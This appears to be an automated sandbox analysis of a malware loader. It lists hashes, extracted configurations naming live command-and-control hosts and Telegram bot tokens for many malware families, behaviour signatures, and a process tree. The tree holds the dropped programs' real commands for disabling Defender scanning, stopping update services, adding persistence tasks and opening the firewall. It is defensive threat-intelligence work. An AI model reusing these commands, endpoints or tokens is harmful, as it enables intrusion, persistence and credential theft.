Resubmissions
04-12-2024 19:44
241204-yftswatlcj 1028-11-2024 19:40
241128-ydqnfaxqgy 1020-11-2024 16:31
241120-t1tw6azjfy 1020-11-2024 06:05
241120-gtdv5ssnes 1020-11-2024 06:00
241120-gqchxascje 1020-11-2024 05:52
241120-gk2kvaxkgn 1018-11-2024 21:54
241118-1sd93a1lfr 1017-11-2024 11:03
241117-m55qwsyemr 316-11-2024 19:06
241116-xsbmdssbkd 1016-11-2024 18:38
241116-w913ya1jcy 10Analysis
-
max time kernel
674s -
max time network
838s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
-
submitted
20-11-2024 06:05
General
-
Target
4363463463464363463463463.exe
-
Size
10KB
-
MD5
2a94f3960c58c6e70826495f76d00b85
-
SHA1
e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
-
SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
-
SHA512
fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
-
SSDEEP
192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K
Score
10/10
Malware Config
Extracted
Family
xworm
C2
rondtimes.top:1940
Attributes
-
Install_directory
%AppData%
-
install_file
XClient.exe
-
pastebin_url
https://pastebin.com/raw/RpncwxSs
Extracted
Family
phorphiex
C2
http://185.215.113.66
http://185.215.113.84
Attributes
-
mutex
Klipux
Extracted
Family
quasar
Version
1.4.1
Botnet
Java
C2
dez345-37245.portmap.host:37245
Mutex
f0e53bcd-851e-44af-8fd5-07d8ab5ed968
Attributes
-
encryption_key
65439CE7DEF3E0FAF01C526FEA90388C9FD487A1
-
install_name
java.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
java ©
-
subdirectory
Programfiles
Extracted
Family
lokibot
C2
http://94.156.177.41/maxzi/five/fre.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Extracted
Family
cobaltstrike
C2
http://192.168.180.12:7810/vN3f
Attributes
-
user_agent
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)
Extracted
Family
stealc
Botnet
LogsDiller
C2
http://194.15.46.65
Attributes
-
url_path
/7f031eb0d257b290.php
Extracted
Family
asyncrat
Version
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Botnet
Default
C2
62.113.117.95:4449
Mutex
hwelcvbupaqfzors
Attributes
-
delay
10
-
install
false
-
install_folder
%AppData%
aes.plain
Extracted
Family
quasar
Version
1.4.1
Botnet
Aryszx
C2
Apichat:4782
Mutex
181f4a12-4cad-46a9-9896-1001033c5b69
Attributes
-
encryption_key
F4F359BEF442D9221F73F7D64267E0E300CC68CE
-
install_name
Runtime Broker.exe
-
log_directory
Logs
-
reconnect_delay
1
-
startup_key
Runtime Broker
Extracted
Family
asyncrat
Version
0.5.8
Botnet
Default
C2
stuff-data.gl.at.ply.gg:54296
Mutex
u81wDUVoFHib
Attributes
-
delay
3
-
install
false
-
install_folder
%AppData%
aes.plain
Extracted
Family
redline
Botnet
Diamotrix
C2
176.111.174.140:1912
Extracted
Family
berbew
C2
http://viruslist.com/wcmd.txt
http://viruslist.com/ppslog.php
http://viruslist.com/piplog.php?%s:%i:%i:%s:%09u:%i:%02d:%02d:%02d
Extracted
Family
gurcu
C2
https://api.telegram.org/bot962023231:AAG4by19NbHDMl2hPuMLesCOvrR264-4hSg/sendMessag
https://api.telegram.org/bot7414426785:AAGjcWvGORe1_ToCk6Lpu9MSjNamkIOlrLs/sendDocumen
Signatures
-
Adds autorun key to be loaded by Explorer.exe on startup 2 TTPs 64 IoCs
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
-
Asyncrat family
-
Avoslocker Ransomware
Avoslocker is a relatively new ransomware, that was observed in late June and early July, 2021.
-
Avoslocker family
-
Berbew
Berbew is a backdoor written in C++.
-
Berbew family
-
Cobaltstrike
Detected malicious payload which is part of Cobaltstrike.
-
Cobaltstrike family
-
Detect Xworm Payload 6 IoCs
-
Detects ZharkBot payload 2 IoCs
ZharkBot is a botnet written C++.
-
Gurcu family
-
Gurcu, WhiteSnake
Gurcu is a malware stealer written in C#.
-
Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
-
Lokibot family
-
Modifies security service 2 TTPs 4 IoCs
-
Phorphiex family
-
Phorphiex payload 4 IoCs
-
Phorphiex, Phorpiex
Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar family
-
Quasar payload 5 IoCs
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 2 IoCs
-
Redline family
-
Stealc
Stealc is an infostealer written in C++.
-
Stealc family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs
-
Windows security bypass 2 TTPs 24 IoCs
-
XMRig Miner payload 20 IoCs
-
Xmrig family
-
Xworm
Xworm is a remote access trojan written in C#.
-
Xworm family
-
ZharkBot
ZharkBot is a botnet written C++.
-
Zharkbot family
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Async RAT payload 1 IoCs
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
-
Renames multiple (3412) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Blocklisted process makes network request 64 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 26 IoCs
Using powershell.exe command.
-
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 4 IoCs
-
Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs
-
Sets service image path in registry 2 TTPs 1 IoCs
-
Stops running service(s) 4 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 46 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 7 IoCs
-
Executes dropped EXE 64 IoCs
-
Loads dropped DLL 39 IoCs
-
Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 3 IoCs
Detects Themida, an advanced Windows software protection system.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Windows security modification 2 TTPs 28 IoCs
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
-
Accesses Microsoft Outlook profiles 1 TTPs 7 IoCs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 15 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Drops desktop.ini file(s) 1 IoCs
-
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Indicator Removal: Clear Persistence 1 TTPs 1 IoCs
Clear artifacts associated with previously established persistence like scheduletasks on a host.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 11 IoCs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Power Settings 1 TTPs 64 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
-
Drops autorun.inf file 1 TTPs 5 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
-
Drops file in System32 directory 64 IoCs
-
Enumerates processes with tasklist 1 TTPs 6 IoCs
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
-
Suspicious use of SetThreadContext 14 IoCs
-
UPX packed file 1 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 36 IoCs
-
Launches sc.exe 26 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Detects Pyinstaller 4 IoCs
-
Embeds OpenSSL 1 IoCs
Embeds OpenSSL, may be used to circumvent TLS interception.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
Program crash 9 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 34 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
-
Checks processor information in registry 2 TTPs 27 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 6 IoCs
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
-
Kills process with taskkill 1 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 64 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs ping.exe 1 TTPs 34 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 45 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
-
Suspicious behavior: SetClipboardViewer 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 31 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
outlook_office_path 1 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Enumerates connected drives
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"2⤵
- Checks computer location settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Files\cabal.exe"C:\Users\Admin\AppData\Local\Temp\Files\cabal.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Files\update.exe"C:\Users\Admin\AppData\Local\Temp\Files\update.exe" mmoparadox4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\5.exe"C:\Users\Admin\AppData\Local\Temp\Files\5.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\sysklnorbcv.exeC:\Windows\sysklnorbcv.exe4⤵
- Modifies security service
- Windows security bypass
- Checks computer location settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: SetClipboardViewer
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\sc.exesc stop UsoSvc6⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc stop WaaSMedicSvc6⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc stop wuauserv6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\sc.exesc stop DoSvc6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\sc.exesc stop BITS6⤵
- Launches sc.exe
-
-
-
C:\Users\Admin\AppData\Local\Temp\302485988.exeC:\Users\Admin\AppData\Local\Temp\302485988.exe5⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f6⤵
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f7⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"6⤵
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"7⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2297530278.exeC:\Users\Admin\AppData\Local\Temp\2297530278.exe5⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\3238922919.exeC:\Users\Admin\AppData\Local\Temp\3238922919.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\2256514898.exeC:\Users\Admin\AppData\Local\Temp\2256514898.exe5⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\3333212685.exeC:\Users\Admin\AppData\Local\Temp\3333212685.exe5⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\11.exe"C:\Users\Admin\AppData\Local\Temp\Files\11.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\sysarddrvs.exeC:\Windows\sysarddrvs.exe4⤵
- Modifies security service
- Windows security bypass
- Checks computer location settings
- Executes dropped EXE
- Windows security modification
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\sc.exesc stop UsoSvc6⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc stop WaaSMedicSvc6⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc stop wuauserv6⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc stop DoSvc6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\sc.exesc stop BITS6⤵
- Launches sc.exe
-
-
-
C:\Users\Admin\AppData\Local\Temp\726420428.exeC:\Users\Admin\AppData\Local\Temp\726420428.exe5⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f6⤵
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f7⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"6⤵
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"7⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3275911949.exeC:\Users\Admin\AppData\Local\Temp\3275911949.exe5⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\93424183.exeC:\Users\Admin\AppData\Local\Temp\93424183.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\3463530481.exeC:\Users\Admin\AppData\Local\Temp\3463530481.exe6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\759028573.exeC:\Users\Admin\AppData\Local\Temp\759028573.exe5⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\2995323471.exeC:\Users\Admin\AppData\Local\Temp\2995323471.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
-
C:\Windows\sysnldcvmr.exeC:\Windows\sysnldcvmr.exe6⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Local\Temp\3347726980.exeC:\Users\Admin\AppData\Local\Temp\3347726980.exe7⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f8⤵
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f9⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"8⤵
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"9⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\106815289.exeC:\Users\Admin\AppData\Local\Temp\106815289.exe7⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\17824204.exeC:\Users\Admin\AppData\Local\Temp\17824204.exe7⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\2416025277.exeC:\Users\Admin\AppData\Local\Temp\2416025277.exe7⤵
- Executes dropped EXE
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\lastest.exe"C:\Users\Admin\AppData\Local\Temp\Files\lastest.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops autorun.inf file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\svchost.exe" "svchost.exe" ENABLE5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM ApplicationFrameHost.exe5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 20445⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Launcher.exe"C:\Users\Admin\AppData\Local\Temp\Files\Launcher.exe"3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Files\svhosts.exe"C:\Users\Admin\AppData\Local\Temp\Files\svhosts.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Java32.exe"C:\Users\Admin\AppData\Local\Temp\Files\Java32.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "java ©" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Programfiles\java.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Users\Admin\AppData\Roaming\Programfiles\java.exe"C:\Users\Admin\AppData\Roaming\Programfiles\java.exe"4⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "java ©" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Programfiles\java.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\caspol.exe"C:\Users\Admin\AppData\Local\Temp\Files\caspol.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Files\caspol.exe"4⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Users\Admin\AppData\Local\Temp\Files\caspol.exe"C:\Users\Admin\AppData\Local\Temp\Files\caspol.exe"4⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\networks_profile.exe"C:\Users\Admin\AppData\Local\Temp\Files\networks_profile.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Files\networks_profile.exe"C:\Users\Admin\AppData\Local\Temp\Files\networks_profile.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"5⤵
-
-
C:\Windows\SYSTEM32\netsh.exenetsh wlan show profiles5⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\7z.exe"C:\Users\Admin\AppData\Local\Temp\Files\7z.exe"3⤵
- Executes dropped EXE
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"3⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x124,0x134,0x7ffc42a446f8,0x7ffc42a44708,0x7ffc42a447184⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2228,13278924538067898369,7460274772165579679,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2240 /prefetch:24⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2228,13278924538067898369,7460274772165579679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 /prefetch:34⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2228,13278924538067898369,7460274772165579679,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2776 /prefetch:84⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,13278924538067898369,7460274772165579679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,13278924538067898369,7460274772165579679,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3448 /prefetch:14⤵
-
-
